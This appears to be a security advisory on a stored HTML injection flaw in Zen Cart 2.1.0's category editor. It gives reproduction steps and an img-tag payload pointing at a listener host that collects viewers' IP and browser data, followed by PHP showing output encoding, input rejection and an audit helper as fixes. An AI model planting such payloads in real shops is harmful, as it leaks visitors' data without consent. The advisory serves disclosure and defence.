Zencart | Information disclosure via HTML injection
Information
| Field | Value |
|---|---|
| Software Type | Web App |
| Software Name | Zen-Cart |
| Affected Version | 2.1.0 |
| Software Vendor | Zen Ventures, LLC |
| Software Link | https://github.com/zencart/zencart |
| Severity | Medium |
| CVSS Score | 4.8 |
| CVE Link | N/A |
| Affected Assets | 30171+ |
| Date of Discovery | Jan 9th, 2025 |
| PoC Exploit | N/A |
Description
The [/zencart/Horse-Kgc-fRizz/index.php?cmd=category_product_listing] endpoint lists the product categories. Each category can be modified through the [/zencart/Horse-Kgc-fRizz/index.php?cmd=categories&cPath=&cID=1&action=edit_category] endpoint.
This endpoint does not sanitize the data passed in the [categories_name[1]] parameter, so an attacker can inject HTML here and collect the IP address and browser data of other users who view the listing.
Reproduce
Open a category for editing:
/zencart/Horse-Kgc-fRizz/index.php?cmd=categories&cPath=&cID=1&action=edit_category
Use the following payload inside [categories_name[1]] parameter:
<img/src=http://127.0.0.1:1718>
Now, whenever someone browses the categories page, you will be able to collect their IP address or browser info:
/zencart/Horse-Kgc-fRizz/index.php?cmd=category_product_listing
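The root cause described above is a stored value that is written into the HTML listing without output encoding. The following is an added PHP example, not Zen Cart's own code, showing the unsafe rendering beside an encoded version, a rejection check for the edit form, and an audit helper that flags already-stored names containing markup. The function names, the row array layout and the column names `categories_id` / `categories_name` are assumptions made for the illustration; the sample input is the payload string quoted in this advisory, used here as constructed data.

```php
<?php
// Added example (not Zen Cart's own code): rendering a stored category name safely.
// The row layout and column names below are assumptions for the illustration.
declare(strict_types=1);

// Vulnerable pattern: the stored name is echoed into the listing unchanged,
// so a name containing markup becomes live HTML in every viewer's browser.
function render_category_cell_unsafe(string $name): string
{
    return '<td>' . $name . '</td>';
}

// Hardened pattern: encode for the HTML text context at output time.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE handles invalid UTF-8
// instead of returning an empty string.
function render_category_cell(string $name): string
{
    $safe = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<td>' . $safe . '</td>';
}

// Defensive input check for the edit form: a category name has no legitimate
// reason to contain angle brackets, so reject it rather than try to clean it.
function is_acceptable_category_name(string $name): bool
{
    return $name !== '' && preg_match('/[<>]/', $name) !== 1;
}

// Audit helper: given rows fetched from the category description table
// (assumed layout: categories_id, categories_name), return the ids whose
// names already contain something that looks like an HTML tag.
function find_tainted_category_names(array $rows): array
{
    $tainted = [];
    foreach ($rows as $row) {
        if (preg_match('/<[a-z!\/]/i', $row['categories_name']) === 1) {
            $tainted[] = $row['categories_id'];
        }
    }
    return $tainted;
}

// Constructed sample data: the advisory's payload and one benign name.
$payload = '<img/src=http://127.0.0.1:1718>';
$rows = [
    ['categories_id' => 1, 'categories_name' => $payload],
    ['categories_id' => 2, 'categories_name' => 'Hardware'],
];

echo render_category_cell_unsafe($payload), PHP_EOL;   // tag survives intact
echo render_category_cell($payload), PHP_EOL;          // angle brackets encoded
var_dump(is_acceptable_category_name($payload));       // rejected at input
print_r(find_tainted_category_names($rows));           // only the injected row
```

Output encoding at render time is the fix that actually closes the issue; the input check only narrows what reaches the database, and the audit helper lets a defender locate category names that were already modified before the fix was applied.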
Proof of Concept (PoC) Video
Posted on: May 24, 2025 06:06 AM